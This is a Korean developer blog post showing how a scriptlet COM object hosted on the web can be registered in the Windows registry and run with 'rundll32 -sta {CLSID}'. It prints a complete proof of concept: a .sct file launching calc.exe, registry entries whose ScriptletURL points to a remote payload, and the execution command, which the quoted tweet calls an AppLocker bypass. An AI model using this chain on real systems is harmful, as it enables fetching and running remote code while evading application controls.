Microsoft MVP성태의 닷넷 이야기
글쓴 사람
정성태 (techsharer at outlook.com)
홈페이지
첨부 파일
 

레지스트리에 등록된 원격지 스크립트 COM 객체 실행 방법

오호... 트위터에서 다음의 글을 보게 되었습니다. ^^

@bohops
; https://twitter.com/bohops/status/1011350358566821891

Interesting way to call a COM CLSID:

rundll32.exe -sta {CLSID}
rundll32.exe /sta {CLSID}

Use this with @subTee's #squiblydoo COM Hijack method for a default AppLocker Bypass

Haven't found any sec-related resources with -sta (single threaded apartment)

Anyone seen this before?

그러니까, COM 객체를 script로 만들 수 있는 기술을 마이크로소프트가 제공하는데요. (정말 오랜만에 보는 군요. scriptlet! 이젠 MSDN에서조차도 자료가 거의 남아 있지 않는데. ^^;)

Scriptlets
; http://www.drdobbs.com/scriptlets/199101569

이 legacy가 아직도 살아있어 Windows 10에서도 동작을 하고 있습니다. 간략하게 기술해 보면, Web 상에 다음과 같은 Script 파일을 보관해 두고,

<?XML version="1.0"?>
<scriptlet>

<registration
    description="Scripting.Dictionary"
    progid="Scripting.Dictionary"
    version="1"
    classid="{00000000-0000-0000-0000-0000000000FF}"
    remotable="true"
    >
</registration>

<script language="JScript">
<![CDATA[

        var r = new ActiveXObject("WScript.Shell").Run("calc.exe");
    
    
]]>
</script>

</scriptlet>

로컬 PC의 CLSID에 위의 scriptlet COM 객체에 명시한 classid의 값으로 다음과 같이 등록해 줍니다.

Windows Registry Editor Version 5.00

[HKEY_CLASSES_ROOT\CLSID\{00000000-0000-0000-0000-0000000000FF}]

[HKEY_CLASSES_ROOT\CLSID\{00000000-0000-0000-0000-0000000000FF}\InprocServer32]
@="C:\\\\WINDOWS\\\\system32\\\\scrobj.dll"

[HKEY_CLASSES_ROOT\CLSID\{00000000-0000-0000-0000-0000000000FF}\ScriptletURL]
@="https://raw.githubusercontent.com/stjeong/LOLBAS/master/OSScripts/Payload/Slmgr_calc.sct"

자, 이제 마지막으로 명령행 창을 열고 해당 COM 객체를 생성해 줍니다.

rundll32 -sta {00000000-0000-0000-0000-0000000000FF}

잘 실행되는군요. ^^

rundll_comserver_1.png




[이 글에 대해서 여러분들과 의견을 공유하고 싶습니다. 틀리거나 미흡한 부분 또는 의문 사항이 있으시면 언제든 댓글 남겨주십시오.]







[최초 등록일: ]
[최종 수정일: 6/27/2018]

Creative Commons License
이 저작물은 크리에이티브 커먼즈 코리아 저작자표시-비영리-변경금지 2.0 대한민국 라이센스에 따라 이용하실 수 있습니다.
by SeongTae Jeong, mailto:techsharer at outlook.com

비밀번호

댓글 작성자
 




... 91  [92]  93  94  95  96  97  98  99  100  101  102  103  104  105  ...
NoWriterDateCnt.TitleFile(s)
11632정성태7/28/201827836Graphics: 14. C# - Unity에서 캐릭터가 바라보는 방향을 기준으로 카메라의 위치 이동 및 회전하는 방법
11631정성태7/27/201829797Graphics: 13. Unity로 실습하는 Shader (9) - 투명 배경이 있는 텍스처 입히기 [1]
11630정성태7/27/201824985개발 환경 구성: 391. (GitHub 등과 직접 연동해) 소스 코드 디버깅을 쉽게 해 주는 SourceLink [3]
11629정성태7/26/201823763.NET Framework: 789. C# 컴파일 옵션 - Check for arithmetic overflow/underflow [2]
11628정성태7/25/201825621Graphics: 12. Unity로 실습하는 Shader (8) - 다중 패스(Multi-Pass Shader)
11627정성태7/25/201819996개발 환경 구성: 390. C# - 컴파일러 옵션 OSS signing / Public Signing
11626정성태7/25/201818382오류 유형: 471. .C++ 함수를 const로 바꾼 경우 C2440 컴파일 오류가 발생한다면?
11625정성태7/24/201817564Math: 49. GeoGebra 기하 (25) - 타원의 중심점 찾기파일 다운로드1
11624정성태7/24/201821962개발 환경 구성: 389. C# - 재현 가능한 빌드(reproducible builds) == Deterministic builds [4]
11623정성태7/24/201821408Math: 48. C# - 가우시안 함수의 이산형(discrete) 커널 값 생성파일 다운로드1
11622정성태7/23/201821579개발 환경 구성: 388. Windows 환경에서 Octave 패키지 설치하는 방법
11621정성태7/23/201819202VC++: 127. 멤버 함수에 대한 포인터를 외부에서 호출하는 방법파일 다운로드1
11620정성태7/22/201822455Graphics: 11. Unity로 실습하는 Shader (7) - Blur (평균값, 가우스, 중간값) 필터 [1]파일 다운로드1
11619정성태7/21/201821496Graphics: 10. Unity로 실습하는 Shader (6) - Mosaic Shading
11618정성태7/20/201818556개발 환경 구성: 387. 삼성 오디세이(Odyssey) 노트북의 운영체제를 새로 설치하는 방법
11617정성태7/20/201819348Team Foundation Server: 50. TFS 소스 코드 관리 기능 (5) - "Rollback", "Rollback Entire Changeset"
11616정성태7/17/201818723Graphics: 9. Unity Shader - 전역 변수의 초기화
11615정성태7/17/201823074.NET Framework: 788. RawInput을 이용한 키보드/마우스 입력 모니터링파일 다운로드1
11614정성태7/17/201825253Graphics: 8. Unity Shader - Texture의 UV 좌표에 대응하는 Pixel 좌표
11613정성태7/16/201821574Graphics: 7. Unity로 실습하는 Shader (5) - Flat Shading
11612정성태7/16/201820572Windows: 148. Windows - Raw Input의 Top level collection 의미
11611정성태7/15/201820795Graphics: 6. Unity로 실습하는 Shader (4) - 퐁 셰이딩(phong shading)
11610정성태7/15/201817319Graphics: 5. Unity로 실습하는 Shader (3) - 고로 셰이딩(gouraud shading) + 퐁 모델(Phong model) + Texture
11609정성태7/15/201820238Graphics: 4. Unity로 실습하는 Shader (2) - 고로 셰이딩(gouraud shading) + 퐁 모델(Phong model)
11608정성태7/15/201824880Graphics: 3. Unity로 실습하는 Shader (1) - 컬러 반전 및 상하/좌우 뒤집기
11607정성태7/14/201825211Graphics: 2. Unity로 실습하는 Shader [1]
... 91  [92]  93  94  95  96  97  98  99  100  101  102  103  104  105  ...